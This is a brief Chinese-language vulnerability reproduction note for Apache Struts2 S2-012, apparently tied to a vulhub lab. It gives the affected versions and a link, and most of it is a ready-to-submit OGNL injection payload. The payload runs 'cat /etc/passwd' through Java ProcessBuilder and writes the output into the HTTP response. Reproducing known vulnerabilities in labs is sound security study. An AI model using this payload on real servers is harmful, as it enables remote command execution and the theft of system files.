漏洞简介
影响版本: 2.1.0 - 2.3.13
详细请到:https://github.com/vulhub/vulhub/blob/master/struts2/s2-012/README.zh-cn.md
漏洞复现
提交以下poc即可运行命令:
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}